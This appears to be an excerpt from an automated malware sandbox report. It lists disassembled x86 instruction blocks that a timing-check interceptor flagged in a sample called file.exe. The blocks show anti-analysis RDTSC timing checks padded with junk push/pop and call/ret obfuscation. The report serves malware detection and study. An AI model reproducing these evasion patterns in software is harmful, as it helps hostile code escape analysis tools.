Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E50E16 second address: E50E59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b cld 0x0000000c push 00000000h 0x0000000e mov ebx, 5044F717h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007FDE71263CE8h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 00000014h 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f mov dword ptr [ebp+12453468h], ebx 0x00000035 mov dword ptr [ebp+122D1FB3h], ebx 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E50E59 second address: E50E60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E53CC5 second address: E53CC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E53CC9 second address: E53D35 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FDE70D000C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007FDE70D000C8h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 mov di, 6A5Ch 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push esi 0x0000002f call 00007FDE70D000C8h 0x00000034 pop esi 0x00000035 mov dword ptr [esp+04h], esi 0x00000039 add dword ptr [esp+04h], 0000001Bh 0x00000041 inc esi 0x00000042 push esi 0x00000043 ret 0x00000044 pop esi 0x00000045 ret 0x00000046 mov edi, ecx 0x00000048 push 00000000h 0x0000004a and edi, 47D88BA4h 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 pushad 0x00000055 popad 0x00000056 push edx 0x00000057 pop edx 0x00000058 popad 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E54C2C second address: E54C9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop esi 0x00000006 push eax 0x00000007 pushad 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ebx 0x0000000c jnc 00007FDE71263CFFh 0x00000012 popad 0x00000013 nop 0x00000014 mov bl, 22h 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push eax 0x0000001b call 00007FDE71263CE8h 0x00000020 pop eax 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 add dword ptr [esp+04h], 00000019h 0x0000002d inc eax 0x0000002e push eax 0x0000002f ret 0x00000030 pop eax 0x00000031 ret 0x00000032 or dword ptr [ebp+122D2795h], eax 0x00000038 push 00000000h 0x0000003a mov di, bx 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007FDE71263CF2h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E56C8F second address: E56C95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E56C95 second address: E56C99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E56C99 second address: E56CCD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007FDE70D000D9h 0x00000014 jmp 00007FDE70D000D3h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E56CCD second address: E56D56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007FDE71263CE8h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 mov edi, dword ptr [ebp+122D2BAFh] 0x0000002a mov ebx, esi 0x0000002c push 00000000h 0x0000002e mov bx, CD86h 0x00000032 xor edi, dword ptr [ebp+12459003h] 0x00000038 push 00000000h 0x0000003a jmp 00007FDE71263CEEh 0x0000003f xchg eax, esi 0x00000040 jne 00007FDE71263D02h 0x00000046 push eax 0x00000047 push ebx 0x00000048 pushad 0x00000049 jnp 00007FDE71263CE6h 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFF0FB second address: DFF105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FDE70D000C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFF105 second address: DFF114 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CEBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFF114 second address: DFF130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jns 00007FDE70D000C6h 0x0000000d jmp 00007FDE70D000CCh 0x00000012 push edi 0x00000013 pop edi 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFF130 second address: DFF13B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 ja 00007FDE71263CE6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFF13B second address: DFF157 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FDE70D000CDh 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFF157 second address: DFF15D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5A7D5 second address: E5A7D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5A7D9 second address: E5A894 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FDE71263CE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FDE71263CF0h 0x0000000f popad 0x00000010 push eax 0x00000011 push ecx 0x00000012 push edx 0x00000013 jnl 00007FDE71263CE6h 0x00000019 pop edx 0x0000001a pop ecx 0x0000001b nop 0x0000001c mov dword ptr [ebp+122D23D4h], ecx 0x00000022 jmp 00007FDE71263CF8h 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push ecx 0x0000002c call 00007FDE71263CE8h 0x00000031 pop ecx 0x00000032 mov dword ptr [esp+04h], ecx 0x00000036 add dword ptr [esp+04h], 0000001Ch 0x0000003e inc ecx 0x0000003f push ecx 0x00000040 ret 0x00000041 pop ecx 0x00000042 ret 0x00000043 mov ebx, 779F8287h 0x00000048 push 00000000h 0x0000004a push 00000000h 0x0000004c push ecx 0x0000004d call 00007FDE71263CE8h 0x00000052 pop ecx 0x00000053 mov dword ptr [esp+04h], ecx 0x00000057 add dword ptr [esp+04h], 00000018h 0x0000005f inc ecx 0x00000060 push ecx 0x00000061 ret 0x00000062 pop ecx 0x00000063 ret 0x00000064 jmp 00007FDE71263CF3h 0x00000069 push eax 0x0000006a push eax 0x0000006b push edx 0x0000006c jmp 00007FDE71263CF3h 0x00000071 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5B804 second address: E5B884 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007FDE70D000C8h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 mov bx, dx 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push edi 0x00000030 call 00007FDE70D000C8h 0x00000035 pop edi 0x00000036 mov dword ptr [esp+04h], edi 0x0000003a add dword ptr [esp+04h], 00000015h 0x00000042 inc edi 0x00000043 push edi 0x00000044 ret 0x00000045 pop edi 0x00000046 ret 0x00000047 add ebx, dword ptr [ebp+122D1E57h] 0x0000004d mov di, bx 0x00000050 mov bx, 56F9h 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 jmp 00007FDE70D000D1h 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5AA0B second address: E5AA0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5B884 second address: E5B88A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5C7F7 second address: E5C867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007FDE71263CE8h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 call 00007FDE71263CEFh 0x00000029 mov ebx, dword ptr [ebp+124868CEh] 0x0000002f pop ebx 0x00000030 push 00000000h 0x00000032 jmp 00007FDE71263CEAh 0x00000037 push 00000000h 0x00000039 mov dword ptr [ebp+122D204Bh], edi 0x0000003f xchg eax, esi 0x00000040 pushad 0x00000041 jng 00007FDE71263CECh 0x00000047 jng 00007FDE71263CE6h 0x0000004d jns 00007FDE71263CE8h 0x00000053 popad 0x00000054 push eax 0x00000055 pushad 0x00000056 push eax 0x00000057 push edx 0x00000058 push edi 0x00000059 pop edi 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5E780 second address: E5E787 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5B9DE second address: E5B9E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5E787 second address: E5E7F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007FDE70D000C8h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 call 00007FDE70D000D5h 0x00000027 mov ebx, dword ptr [ebp+122D2D0Fh] 0x0000002d pop edi 0x0000002e push 00000000h 0x00000030 clc 0x00000031 push 00000000h 0x00000033 xor edi, dword ptr [ebp+122D2B92h] 0x00000039 push eax 0x0000003a push esi 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007FDE70D000D1h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5CAF8 second address: E5CAFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5B9E3 second address: E5B9E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5E7F0 second address: E5E7F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5B9E9 second address: E5B9ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5DA41 second address: E5DA57 instructions: 0x00000000 rdtsc 0x00000002 je 00007FDE71263CECh 0x00000008 jng 00007FDE71263CE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5B9ED second address: E5B9FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5DA57 second address: E5DA5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5B9FB second address: E5B9FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5DB2B second address: E5DB2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5DB2F second address: E5DB33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E5DB33 second address: E5DB3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DFBBEA second address: DFBBF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E61E0B second address: E61E0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E62D87 second address: E62D92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FDE70D000C6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E62D92 second address: E62E37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jc 00007FDE71263CEEh 0x00000010 jnp 00007FDE71263CE8h 0x00000016 nop 0x00000017 jmp 00007FDE71263CF6h 0x0000001c push 00000000h 0x0000001e call 00007FDE71263CEAh 0x00000023 add ebx, 38527AF4h 0x00000029 pop ebx 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push eax 0x0000002f call 00007FDE71263CE8h 0x00000034 pop eax 0x00000035 mov dword ptr [esp+04h], eax 0x00000039 add dword ptr [esp+04h], 00000019h 0x00000041 inc eax 0x00000042 push eax 0x00000043 ret 0x00000044 pop eax 0x00000045 ret 0x00000046 jmp 00007FDE71263CF1h 0x0000004b xchg eax, esi 0x0000004c pushad 0x0000004d jmp 00007FDE71263CF5h 0x00000052 push esi 0x00000053 push eax 0x00000054 pop eax 0x00000055 pop esi 0x00000056 popad 0x00000057 push eax 0x00000058 push ebx 0x00000059 push eax 0x0000005a push edx 0x0000005b push edi 0x0000005c pop edi 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E62F60 second address: E63001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 mov dword ptr [ebp+122D2B88h], edx 0x0000000e call 00007FDE70D000D0h 0x00000013 mov edi, dword ptr [ebp+122D2C3Bh] 0x00000019 pop edi 0x0000001a push dword ptr fs:[00000000h] 0x00000021 pushad 0x00000022 popad 0x00000023 mov dword ptr fs:[00000000h], esp 0x0000002a pushad 0x0000002b xor dword ptr [ebp+1247803Ah], edx 0x00000031 movzx eax, dx 0x00000034 popad 0x00000035 mov eax, dword ptr [ebp+122D0029h] 0x0000003b push 00000000h 0x0000003d push esi 0x0000003e call 00007FDE70D000C8h 0x00000043 pop esi 0x00000044 mov dword ptr [esp+04h], esi 0x00000048 add dword ptr [esp+04h], 0000001Ah 0x00000050 inc esi 0x00000051 push esi 0x00000052 ret 0x00000053 pop esi 0x00000054 ret 0x00000055 sub ebx, 0168FF56h 0x0000005b sub dword ptr [ebp+122D1ED6h], ecx 0x00000061 push FFFFFFFFh 0x00000063 mov di, D2DBh 0x00000067 jmp 00007FDE70D000CCh 0x0000006c nop 0x0000006d pushad 0x0000006e push eax 0x0000006f push edx 0x00000070 jmp 00007FDE70D000D7h 0x00000075 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E66304 second address: E66308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E66308 second address: E6630C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E63ECA second address: E63EE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDE71263CF3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E09244 second address: E0925E instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FDE70D000CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f pop eax 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E6D85E second address: E6D862 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E6D862 second address: E6D868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E72671 second address: E7267B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7267B second address: E726AB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FDE70D000D6h 0x00000013 jmp 00007FDE70D000CBh 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E726AB second address: E726D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jnl 00007FDE71263CEEh 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 pushad 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7A7FF second address: E7A819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FDE70D000CAh 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007FDE70D000C8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7A819 second address: E7A827 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FDE71263CE8h 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E79482 second address: E79486 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E79486 second address: E79495 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CEAh 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E79495 second address: E7949B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E79A60 second address: E79A65 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E79D92 second address: E79DAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE70D000D6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E79DAC second address: E79DC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007FDE71263CECh 0x0000000c pop ebx 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E79DC6 second address: E79DCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E79DCA second address: E79DF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FDE71263CEFh 0x0000000b push ebx 0x0000000c ja 00007FDE71263CE6h 0x00000012 pop ebx 0x00000013 pushad 0x00000014 jp 00007FDE71263CE6h 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7A229 second address: E7A233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FDE70D000C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7A233 second address: E7A23E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7A23E second address: E7A277 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE70D000D7h 0x00000009 jmp 00007FDE70D000D8h 0x0000000e popad 0x0000000f pop eax 0x00000010 push edi 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7A6AB second address: E7A6BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE71263CEBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7FFF1 second address: E7FFF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7FFF5 second address: E80003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E80003 second address: E8000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7E954 second address: E7E971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE71263CF6h 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7E971 second address: E7E977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7EADC second address: E7EAE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7EAE1 second address: E7EAE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7EAE9 second address: E7EB02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007FDE71263CEEh 0x0000000b ja 00007FDE71263CE6h 0x00000011 push eax 0x00000012 pop eax 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push ebx 0x00000016 push esi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7EB02 second address: E7EB12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push edi 0x00000008 jo 00007FDE70D000C6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7F03B second address: E7F041 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E7F041 second address: E7F045 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
